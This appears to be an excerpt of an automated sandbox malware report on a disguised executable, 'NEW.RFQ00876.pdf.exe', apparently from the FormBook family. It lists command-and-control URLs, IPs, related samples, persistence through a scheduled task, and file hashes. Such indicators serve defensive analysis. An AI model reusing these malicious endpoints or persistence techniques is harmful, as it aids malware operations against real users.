                http://www.kvsj.net/zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byl0%Avira URL Cloudsafe
                http://www.dietcoffee.online/ugyg/0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/7mvy/0%Avira URL Cloudsafe
                http://www.smartcongress.net/m1g9/0%Avira URL Cloudsafe
                http://www.learniit.info/n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+l0%Avira URL Cloudsafe
                http://www.rysanekbeton.cloud/k6bb/0%Avira URL Cloudsafe
                http://www.vayui.top/ge5i/0%Avira URL Cloudsafe
                http://www.krshop.shop/5p01/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.bankseedz.info
                		46.30.211.38
                		truetrueunknown
                www.vayui.top
                		172.67.145.234
                		truefalse
                  		high
                  www.learniit.info
                  		203.161.42.73
                  		truetrue
                    		unknown
                    carsten.studio
                    		217.160.0.200
                    		truetrueunknown
                    www.airrelax.shop
                    		172.67.215.235
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truefalse
                        		high
                        www.krshop.shop
                        		13.248.169.48
                        		truetrue
                          		unknown
                          www.kvsj.net
                          		173.236.199.97
                          		truetrue
                            		unknown
                            www.questmatch.pro
                            		104.21.62.184
                            		truefalse
                              		high
                              www.mrpokrovskii.pro
                              		85.25.177.138
                              		truefalse
                                		high
                                smartcongress.net
                                		146.88.233.115
                                		truetrue
                                  		unknown
                                  www.dietcoffee.online
                                  		77.68.64.45
                                  		truetrue
                                    		unknown
                                    rysanekbeton.cloud
                                    		81.2.196.19
                                    		truetrue
                                      		unknown
                                      www.sodatool.site
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.rysanekbeton.cloud
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.zoiheat.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.carsten.studio
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.tb0.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.smartcongress.net
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.learniit.info/n8su/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bankseedz.info/an5q/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bankseedz.info/an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dietcoffee.online/ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/8true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.krshop.shop/5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.carsten.studio/8mom/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.questmatch.pro/1yxc/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.airrelax.shop/gvzg/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oAtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.kvsj.net/zu0o/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.questmatch.pro/1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.airrelax.shop/gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rysanekbeton.cloud/k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5qtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.kvsj.net/zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.zoiheat.xyz/ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dietcoffee.online/ugyg/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.smartcongress.net/m1g9/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mrpokrovskii.pro/7mvy/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rysanekbeton.cloud/k6bb/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.learniit.info/n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+ltrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vayui.top/ge5i/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.krshop.shop/5p01/true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabmsinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://securepubads.g.doubleclick.net/tag/js/gpt.jsmsinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icomsinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV9msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.ecosia.org/newtab/msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drfalse
                                                                  		high
                                                                  http://www.vayui.topaegBDZrMeWOlT.exe, 0000001B.00000002.3733834808.00000000054AB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://playchill.top/api/axgames/request?domain=$msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://gamesfunny.top$msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://code.jquery.com/jquery-3.5.1.min.jsmsinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssmsinfo32.exe, 0000001A.00000002.3732924393.0000000005F80000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003D60000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RAangyFeHdZLco.exe, 00000014.00000002.1407964518.0000000002725000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.strato.deaegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.00000000043A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  146.88.233.115
                                                                                  		smartcongress.netFrance
                                                                                  		53589PLANETHOSTER-8CAtrue
                                                                                  13.248.169.48
                                                                                  		www.krshop.shopUnited States
                                                                                  		16509AMAZON-02UStrue
                                                                                  104.21.62.184
                                                                                  		www.questmatch.proUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  81.2.196.19
                                                                                  		rysanekbeton.cloudCzech Republic
                                                                                  		24806INTERNET-CZKtis238403KtisCZtrue
                                                                                  85.159.66.93
                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                  		34619CIZGITRfalse
                                                                                  172.67.215.235
                                                                                  		www.airrelax.shopUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  77.68.64.45
                                                                                  		www.dietcoffee.onlineUnited Kingdom
                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                  217.160.0.200
                                                                                  		carsten.studioGermany
                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                  203.161.42.73
                                                                                  		www.learniit.infoMalaysia
                                                                                  		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                  85.25.177.138
                                                                                  		www.mrpokrovskii.proGermany
                                                                                  		8972GD-EMEA-DC-SXB1DEfalse
                                                                                  172.67.145.234
                                                                                  		www.vayui.topUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  173.236.199.97
                                                                                  		www.kvsj.netUnited States
                                                                                  		26347DREAMHOST-ASUStrue
                                                                                  46.30.211.38
                                                                                  		www.bankseedz.infoDenmark
                                                                                  		51468ONECOMDKtrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1571204
                                                                                  Start date and time:2024-12-09 06:55:26 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 11m 50s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:32
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:NEW.RFQ00876.pdf.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@23/16@18/13
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 94%
                                                                                  • Number of executed functions: 137
                                                                                  • Number of non-executed functions: 294
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  00:56:20API Interceptor1x Sleep call for process: NEW.RFQ00876.pdf.exe modified
                                                                                  00:56:23API Interceptor54x Sleep call for process: powershell.exe modified
                                                                                  00:56:30API Interceptor1x Sleep call for process: RAangyFeHdZLco.exe modified
                                                                                  02:14:34API Interceptor11188602x Sleep call for process: msinfo32.exe modified
                                                                                  06:56:28Task SchedulerRun new task: RAangyFeHdZLco path: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  146.88.233.115Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.smartcongress.net/qtfx/
                                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/qtfx/
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartcongress.net/11t3/
                                                                                  13.248.169.48DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.egyshare.xyz/440l/
                                                                                  purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.aktmarket.xyz/wb7v/
                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.avalanchefi.xyz/vxa5/
                                                                                  ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.remedies.pro/4azw/
                                                                                  Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.smartgov.shop/1cwp/
                                                                                  SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.egyshare.xyz/440l/
                                                                                  attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.aktmarket.xyz/wb7v/
                                                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.tals.xyz/k1td/
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.optimismbank.xyz/98j3/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.bankseedz.infoDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 46.30.211.38
                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 46.30.211.38
                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                  • 46.30.211.38
                                                                                  natroredirect.natrocdn.comDHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  New Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 85.159.66.93
                                                                                  specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 85.159.66.93
                                                                                  www.vayui.topek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.145.234
                                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.95.160
                                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.145.234
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 172.67.145.234
                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.95.160
                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.145.234
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 172.67.145.234
                                                                                  S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 104.21.95.160
                                                                                  purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.145.234
                                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.145.234
                                                                                  www.airrelax.shopOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.215.235
                                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 104.21.16.206

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSSN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.177.137
                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.67.152
                                                                                  BUNKER INVOICE MV SUN OCEAN.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.65.104
                                                                                  Bunker_STS_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.71.195
                                                                                  Payment_Advice.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.148.42
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.16.9
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.35.43
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.30.121.99
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  AMAZON-02USjew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 54.171.230.55
                                                                                  jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 18.162.175.118
                                                                                  jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 18.241.248.28
                                                                                  jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 13.122.1.68
                                                                                  jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 35.167.253.50
                                                                                  jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 13.214.56.69
                                                                                  jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                  • 54.97.170.50
                                                                                  i.elfGet hashmaliciousUnknownBrowse
                                                                                  • 54.171.230.55
                                                                                  Software_Tool.exeGet hashmaliciousUnknownBrowse
                                                                                  • 3.171.171.38
                                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 54.171.230.55
                                                                                  INTERNET-CZKtis238403KtisCZjmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                                  • 81.2.245.22
                                                                                  lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  89778Cpy.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                  • 81.2.196.19
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • 81.2.194.241
                                                                                  PLANETHOSTER-8CAQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 146.88.233.115
                                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 146.88.233.115
                                                                                  Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 146.88.233.115
                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                  • 146.88.233.115
                                                                                  https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                  • 146.88.234.239
                                                                                  EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 199.16.129.175
                                                                                  Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                  • 85.236.153.44

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW.RFQ00876.pdf.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
